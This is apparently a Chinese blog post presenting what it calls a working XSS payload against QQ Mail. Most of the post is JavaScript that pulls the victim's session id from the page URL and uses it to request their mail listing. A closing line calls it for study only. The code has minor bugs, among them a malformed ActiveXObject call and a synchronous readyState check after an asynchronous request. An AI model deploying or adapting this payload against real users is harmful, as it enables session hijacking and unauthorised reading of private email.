QQ邮箱有效的XSS payload

QQ邮箱XSS注入攻击有效payload

1 network中看到请求,经过分析后找到实际请求
QQ邮箱有效的XSS payload_第1张图片
遂将所有参数修改,并截取有效sid

	var sid="";
    if(top.window.location.href.indexOf("sid")>0){
         var href=top.window.location.href;

	 sid=href.substring(href.indexOf("sid")+4,href.indexOf("&"));
}
console.log("sid="+sid)
var  floder_url="https://"+top.window.location.host+"
/cgi-bin/mail_list?sid="+sid+"&page=0&sortasc=0&sorttype=7";

var ajax=null;
if(window.XMLHttpRequest){
    ajax=new XMLHttpRequest();
}else if (window.ActiveXObject){
	ajax=new ActiveXObject("Microsoft")
}
console.log("ajax="+ajax);
ajax.open("GET",floder_url,true)
ajax.send(null);
console.log(ajax);
if(ajax.readyState==4&&ajax.status==200){
	console.log("ajax="+ajax.responseText);
}

最终响应为QQ邮箱有效的XSS payload_第2张图片
该文档Payload有效
ps:该文档仅供学习切勿犯法,如需转载,需注明出处。

你可能感兴趣的:(渗透,XSS)